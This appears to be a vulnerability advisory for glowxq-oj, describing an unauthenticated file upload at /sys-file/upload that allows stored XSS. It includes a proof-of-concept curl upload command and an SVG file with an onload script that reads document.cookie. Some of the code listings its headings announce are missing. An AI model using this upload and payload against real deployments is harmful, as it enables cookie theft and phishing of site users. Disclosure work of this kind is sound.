NeverStopExploiting用户9473
Unauthenticated Arbitrary File Upload via SysFileController to XSS in glowxq-oj
输入“/”快速插入内容
Unauthenticated Arbitrary File Upload via SysFileController to XSS in glowxq-oj
Unauthenticated Arbitrary File Upload via SysFileController to XSS in glowxq-oj
用户9473用户94733月3日修改
BUG_Author: Chengxin Xu
Affected Version: glowxq-oj (glowxq-oj-main)
Vulnerability Files:
•
business/business-system/src/main/java/com/glowxq/system/admin/controller/SysFileController.java
•
business/business-system/src/main/java/com/glowxq/system/admin/service/impl/SysFileServiceImpl.java
•
common/common-oss/src/main/java/com/glowxq/oss/OssClient.java
Description
glowxq-oj contains an unauthenticated arbitrary file upload vulnerability in the file management functionality. The SysFileController class is annotated with @SaIgnore which disables all authentication. The upload endpoint accepts any file type without validation. This allows unauthenticated attackers to upload malicious files (HTML, SVG) that are immediately accessible via a public URL, which can be used to conduct phishing attacks, steal user cookies, and perform other client-side attacks such as stored XSS.
Unauthenticated File Upload via /sys-file/upload
Entry Point (SysFileController.java:34-47):
The service layer performs no validation and delegates directly to OssClient:
No Validation (SysFileServiceImpl.java):
OssClient preserves original filename and trusts Content-Type (OssClient.java:98-116):
Prerequisites
•
No authentication required
Step 1: Upload Malicious SVG for Stored XSS
代码块
curl -X POST http://localhost:7101/api/sys-file/upload \
-F "dirTag=avatar" \
-F "file=@xss.svg;type=image/svg+xml"
Where xss.svg contains:
代码块
<?xml version="1.0" encoding="UTF-8"?>
<svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.cookie)">
<text x="0" y="20">XSS via SVG</text>
</svg>
Step 2: Access the Uploaded File
Visit the returned URL. The SVG is served with Content-Type: image/svg+xml, and the onload JavaScript executes immediately, stealing cookies or performing actions on behalf of the victim.